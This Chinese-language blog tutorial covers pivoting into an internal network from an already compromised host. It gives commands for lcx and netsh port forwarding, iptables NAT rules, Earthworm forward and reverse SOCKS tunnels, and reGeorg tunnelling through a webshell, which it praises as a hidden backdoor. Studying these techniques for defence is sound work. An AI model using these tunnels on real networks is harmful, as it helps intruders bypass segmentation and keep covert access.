内网渗透-内网穿透工具

作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途

内网穿透
  • 内网穿透
    • lcx
    • netsh
    • iptables
    • Earthworm
  • 端口复用
    • reGeorg
  • 小结

内网穿透 想从外网渗透内网主机,但内网很多主机不直接连外网,所以要进行搭建通道
(前提是已经控制了一台主机,通过这台主机渗透其他内网主机
win端口转发:lcx.exe netsh
linux端口转发:portmap iptables
多平台:Earthworm
端口复用:reGeorg
lcx win平台的一款老工具。
(好用是好用,就是被放进全家桶了)
//端口转发(listen和slave) lcx.exe -listen 8080 8081 //监听两个端口 lcx.exe -slave 192.168.1.128 8080 192.168.1.131 8888 //连接128:8080端口时映射到131:8888端口

//端口映射(tran) lcx -tran 8888 127.0.0.1 3306 //把8088端口映射到3306端口

netsh win平台内置的命令
运行cmd
//xp需要安装ipv6 netsh interface ipv6 install

开启防火墙需要放行tcp端口
//设置一个规则v4tov4,访问192.168.1.132:6666端口会转发到192.168.1.128:3389端口 netsh interface portproxy set v4tov4 listenaddress=192.168.1.132 listenport=6666 connectaddress=192.168.1.128 connectport=3389

取消端口转发
netsh interface portproxy delete v4tov4 listenaddress=192.168.1.132 listenport=3389

查看已有配置
netsh interface portproxy show v4tov4 netsh interface portproxy show all

iptables linux的端口转发
开启内核转发
echo 1 > /proc/sys/net/ipv4/ip_forward sysctl -p

配置端口转发
//正向代理 //访问192.168.1.131:8888跳转到192.168.1.128:80iptables -t nat -A PREROUTING --dst 192.168.1.131 -p tcp --dport 8888 -j DNAT --to-destination 192.168.1.128:80 iptables -t nat -A POSTROUTING --dst 192.168.1.128 -p tcp --dport 80 -j SNAT --to-source 192.168.1.131 service iptables save && service iptables start //保存重启

iptables -t nat -A PREROUTING -p tcp -m tcp --dport 8888 -j DNAT --to-destination 192.168.1.128:80 iptables -t nat -A POSTROUTING -s 192.168.0.0/16 -d 192.168.1.128 -p tcp -m tcp --dport 80 -j SNAT --to-source 192.168.1.131

//本机之间端口转发 iptables -t nat -A PREROUTING -p tcp --dport 8888 -j REDIRECT --to-ports 3389 service iptables save && service iptables start //保存重启

Earthworm 代理和端口转发一身的多平台工具(win,linux,mac之间来回穿透)
//正向连接 ew_win32.exe -s ssocksd -l 8082 //直接变成socks5代理服务器

//反向连接 ew_win32.exe -s rcsocks -l 8081 -e 8082 //监听本机8082端口,等待内网主机连接,访问本机8081就能链接内网 ew_win32.exe -s rssocks -d 192.168.1.1 -e 8082 //内网主机转发到外网8082端口

端口复用 一个端口运行多个应用
(适用于服务器只开放了80端口,就凑合一下一起从80端口进出数据)
(有很好的隐藏后门,不用再开通个端口)
reGeorg Python2.7写的一款工具,结合Webshell从80端口进行传输。
支持多种语言
https://github.com/sensepost/reGeorg
python2 reGeorgSocksProxy.py -l <监听地址> -p <本地服务监听的端口> -u python2 reGeorgSocksProxy.py -l 192.168.1.131 -p 9999 -u http://192.168.1.128/tunnel.nosocket.php

小结 搭建好以后,就可以通过浏览器添加代理,或用socks5工具等等配置全局代理啥的。
【内网渗透-内网穿透工具】获取工具
可关注微信公众号:XG小刚
回复:内网穿透工具
内网渗透-内网穿透工具
文章图片

    推荐阅读